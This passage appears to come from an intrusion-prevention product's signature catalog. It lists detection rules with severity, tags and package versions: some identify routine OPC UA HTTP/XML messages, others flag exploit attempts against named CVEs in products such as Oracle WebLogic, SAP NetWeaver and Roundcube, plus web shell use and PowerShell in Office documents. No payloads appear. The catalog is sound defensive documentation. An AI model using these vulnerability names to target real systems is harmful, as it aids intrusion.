Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-RegisterNodes-Request

About this situation: An OPC UA HTTP/XML RegisterNodes request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-RegisterNodes-Response

About this situation: An OPC UA HTTP/XML RegisterNodes response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-RegisterServer-Request

About this situation: An OPC UA HTTP/XML RegisterServer request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-RegisterServer-Response

About this situation: An OPC UA HTTP/XML RegisterServer response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Republish-Request

About this situation: An OPC UA HTTP/XML Republish request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Republish-Response

About this situation: An OPC UA HTTP/XML Republish response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-ServiceFault

About this situation: An OPC UA HTTP/XML ServiceFault detected
Context: Identified Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-SetMonitoringMode-Request

About this situation: An OPC UA HTTP/XML SetMonitoringMode request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-SetMonitoringMode-Response

About this situation: An OPC UA HTTP/XML SetMonitoringMode response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-SetPublishingMode-Request

About this situation: An OPC UA HTTP/XML SetPublishingMode request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-SetPublishingMode-Response

About this situation: An OPC UA HTTP/XML SetPublishingMode response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-SetTriggering-Request

About this situation: An OPC UA HTTP/XML SetTriggering request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-SetTriggering-Response

About this situation: An OPC UA HTTP/XML SetTriggering response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Shared-Variables

About this situation: This fingerprint sets shared variables for OPC UA HTTP/XML - do not disable
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-TestStack-Request

About this situation: An OPC UA HTTP/XML TestStack request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-TestStack-Response

About this situation: An OPC UA HTTP/XML TestStack response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-TestStackEx-Request

About this situation: An OPC UA HTTP/XML TestStackEx request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-TestStackEx-Response

About this situation: An OPC UA HTTP/XML TestStackEx response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-TransferSubscriptions-Request

About this situation: An OPC UA HTTP/XML TransferSubscriptions request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-TransferSubscriptions-Response

About this situation: An OPC UA HTTP/XML TransferSubscriptions response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-TranslateBrowsePathsToNodeIds-Request

About this situation: An OPC UA HTTP/XML TranslateBrowsePathsToNodeIds request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-TranslateBrowsePathsToNodeIds-Response

About this situation: An OPC UA HTTP/XML TranslateBrowsePathsToNodeIds response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-UnregisterNodes-Request

About this situation: An OPC UA HTTP/XML UnregisterNodes request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-UnregisterNodes-Response

About this situation: An OPC UA HTTP/XML UnregisterNodes response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Write-Request

About this situation: An OPC UA HTTP/XML Write request detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

File-TextId_OPC-UA-HTTP/XML-Write-Response

About this situation: An OPC UA HTTP/XML Write response detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC UA HTTP/XML, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-645-5211
Description:
Back to top

File-TextId_OpenNMS-Authenticated-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in OpenNMS detected
Context: Identified Text File Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, OpenNMS, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: OpenNMS-Privilege-Escalation-CVE-2023-40315
OpenNMS-Privilege-Escalation-CVE-2023-0872
Description:
Back to top

File-TextId_OpenOffice.org-XPM-File-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenOffice.org OpenOffice detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: OpenOffice.org-XPM-File-Processing-Integer-Overflow
Description:
Back to top

File-TextId_Opera-SVG-Animation-Element-DoS

About this situation: An attempt to exploit a Opera SVG Animation Element DoS vulnerability.
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Opera, Any Operating System not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-676-5211
Vulnerability: Opera-SVG-Animation-Element-DoS
Description:
Back to top

File-TextId_Opera-SVG-clipPath-After-Memory-Corruption

About this situation: Opera SVG clipPath use-after-free exploit detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Opera, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-847-5242
Vulnerability: Opera-SVG-clipPath-After-Memory-Corruption
Description:
Back to top

File-TextId_Oracle-Business-Intelligence-CVE-2021-2401-Xdo-Xml-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence Enterprise Edition detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1382-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Oracle-Business-Intelligence-CVE-2021-2401-Xdo-Xml-External-Entity-Injection
Description:
Back to top

File-TextId_Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1668-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616
Description:
Back to top

File-TextId_Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence Enterprise Edition detected.
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2021, Any Operating System not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1448-5242
Last changed: sgpkg-ips-1448-5242
Vulnerability: Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection
Description:
Back to top

File-TextId_Oracle-E-Business-Suite-Arbitrary-File-Upload-CVE-2022-21587

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1555-5242
Vulnerability: Oracle-E-Business-Suite-Arbitrary-File-Upload-CVE-2022-21587
Description:
Back to top

File-TextId_Oracle-GoldenGate-Veridata-Server-XML-Soap-Request-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle GoldenGate Veridata detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle GoldenGate Veridata, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1590-5242
Vulnerability: Oracle-GoldenGate-Veridata-Server-XML-Soap-Request-Buffer-Overflow
Description:
Back to top

File-TextId_Oracle-Java-Web-Start-Argument-Injection-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Oracle Sun Java Runtime Environment (JRE) detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-570-5211
Vulnerability: Oracle-Java-Web-Start-Command-Argument-Injection-Remote-Code-Execution
Sun-Java-Web-Start-Double-Quote-Injection
Description:
Back to top

File-TextId_Oracle-Outside-In-XPM-Image-Processing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Oracle-Outside-In-XPM-Image-Processing-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Oracle-WebLogic-CVE-2019-2725-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1158-5242
Vulnerability: Oracle-WebLogic-CVE-2019-2725-Insecure-Deserialization
Description:
Back to top

File-TextId_Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101

About this situation: An attempt to exploit a vulnerability in Perl Spreadsheet::ParseExcel detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Barracuda ESG, Perl, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1705-5242
Last changed: sgpkg-ips-1705-5242
Vulnerability: Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101
Description:
Back to top

File-TextId_Perl-WebShell-Usage-Detected

About this situation: Suspicious traffic detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1117-5242
Description:
Back to top

File-TextId_PHP-Filter-In-SVG-HREF

About this situation: Link beginning with a PHP filter
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1756-5242
Description:
Back to top

File-TextId_Possible-Malicious-XML-Scriplet

About this situation: Possible malicious XML scriplet was detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1123-5242
Vulnerability: Possible-Malicious-XML-Scriplet
Description:
Back to top

File-TextId_Potential-Ghostscript-Format-String-Exploitation-CVE-2024-29510

About this situation: An attempt to exploit a vulnerability in Ghostscript detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ghostscript, CVE2024, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1750-5242
Vulnerability: Ghostscript-Format-String-Exploitation-CVE-2024-29510
Description:
Back to top

File-TextId_PowerShell-In-Office-Document

About this situation: References to Powershell use in Office documents detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1010-5242
Last changed: sgpkg-ips-1010-5242
Vulnerability: PowerShell-In-Office-Document
Description:
Back to top

File-TextId_Progress-WhatsUp-Gold-Getfilewithoutzip-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Progress Software WhatsUp Gold detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Progress WhatsUp Gold, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1760-5242
Last changed: sgpkg-ips-1760-5242
Vulnerability: Progress-WhatsUp-Gold-Getfilewithoutzip-Directory-Traversal
Description:
Back to top

File-TextId_RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-558-5211
Vulnerability: RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow
Description:
Back to top

File-TextId_RealNetworks-RealPlayer-Rmp-File-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: RealNetworks-RealPlayer-Rmp-File-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_RealNetworks-RealPlayer-URL-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-1755-5242
Vulnerability: RealNetworks-RealPlayer-URL-Parsing-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_RealNetworks-SMIL-Wallclock-Stack-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in RealNetworks Helix Player and RealPlayer detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, Helix Player, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: RealNetworks-SMIL-Wallclock-Stack-Overflow
Description:
Back to top

File-TextId_RealPlayer-SMIL-Screen-Size-System-Compromise

About this situation: RealPlayer .SMIL screen size parameter buffer overflow exploit
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, RealOne Player, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: HTTP-RealPlayer-SMIL-Screen-Size-System-Compromise
Description:
Back to top

File-TextId_Realtek-SDK-Miniigd-OS-Command-Injection

About this situation: An attempt to exploit a Realtek SDK miniigd OS Command Injection vulnerability.
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Realtek SDK, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Vulnerability: Realtek-SDK-Miniigd-OS-Command-Injection
Description:
Back to top

File-TextId_Rockwell-Automation-CCW-ccwsln-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Rockwell Automation Connected Components Workbench detected.
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Rockwell Automation Connected Components Workbench, CVE2022, Any Operating System not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Vulnerability: Rockwell-Automation-CCW-ccwsln-External-Entity-Injection
Description:
Back to top

File-TextId_Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in RoundCube Webmail detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1661-5242
Last changed: sgpkg-ips-1661-5242
Vulnerability: Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting
Description:
Back to top

File-TextId_Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008

About this situation: An attempt to exploit a vulnerability in RoundCube Webmail detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Vulnerability: Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008
Description:
Back to top

File-TextId_Roundcube-Webmail-SVG-Animate-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in RoundCube Webmail
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Vulnerability: Roundcube-Webmail-SVG-Animate-Stored-Cross-Site-Scripting
Description:
Back to top

File-TextId_Safari-Stack-Based-Out-Of-Bounds

About this situation: An attempt to exploit a vulnerability in Safari detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Safari-Stack-Based-Out-Of-Bounds
Description:
Back to top

File-TextId_SAP-Netweaver-CVE-2020-6287

About this situation: An attempt to exploit a vulnerability in SAP Netweaver
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1271-5242
Vulnerability: SAP-Netweaver-CVE-2020-6287
Description:
Back to top

File-TextId_SAP-Netweaver-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in SAP Netweaver
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1265-5242
Last changed: sgpkg-ips-1265-5242
Vulnerability: SAP-Netweaver-Directory-Traversal
Description:
Back to top

File-TextId_SAP-Netweaver-Information-Disclosure

About this situation: An attempt to exploit a SAP Netweaver Information Disclosure vulnerability detected.
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2013, Any Operating System not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-705-5211
Vulnerability: SAP-Netweaver-Information-Disclosure
Description:
Back to top

File-TextId_SAP-Netweaver-Soap-Interface-Arbitrary-Command-Execution

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-1453-5242
Vulnerability: SAP-Netweaver-Soap-Interface-Arbitrary-Command-Execution
Description:
Back to top

File-TextId_SAP-Netweaver-Soap-Request-Sxpg_Call_System-Command-Execution

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: SAP-Netweaver-Soap-Request-Sxpg_Call_System-Command-Execution
Description:
Back to top

File-TextId_SAP-Netweaver-SQL-Injection-CVE-2016-2386

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1513-5242
Vulnerability: SAP-Netweaver-SQL-Injection-CVE-2016-2386
Description:
Back to top

File-TextId_SAP-Solution-Manager-Missing-Authentication-Check-EEM-Servlet-Access

About this situation: An attempt to exploit a vulnerability in SAP Solution Manager detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, SAP Solution Manager, CVE2020, Windows not specific, Linux not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: SAP-Solution-Manager-Remote-Command-Execution
Description:
Back to top

File-TextId_Schneider-Electric-IGSS-Dashboard-CVE-2023-3001-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric IGSS, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1670-5242
Vulnerability: Schneider-Electric-IGSS-Dashboard-CVE-2023-3001-Insecure-Deserialization
Description:
Back to top

File-TextId_Schneider-Electric-IGSS-DashBoard.exe-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected.
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric IGSS, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: Schneider-Electric-IGSS-DashBoard.exe-Insecure-Deserialization
Description:
Back to top

File-TextId_Schneider-Electric-Vampset-Comtrade-Records-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Schneider Electric VAMPSET detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric VAMPSET, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Schneider-Electric-Vampset-Comtrade-Records-Buffer-Overflow
Description:
Back to top

File-TextId_Script-In-SVG

About this situation: Detected script within SVG tags
Context: Identified Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-487-5211
Description:
Back to top

File-TextId_Sew-Eurodrive-Movitools-Motionstudio-Checkprojectbaseformat-XML-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in SEW-EURODRIVE MOVITOOLS MotionStudio detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SEW-EURODRIVE MOVITOOLS MotionStudio, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1759-5242
Last changed: sgpkg-ips-1759-5242
Vulnerability: Sew-Eurodrive-Movitools-Motionstudio-Checkprojectbaseformat-XEE-Injection
Description:
Back to top

File-TextId_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-487-5211
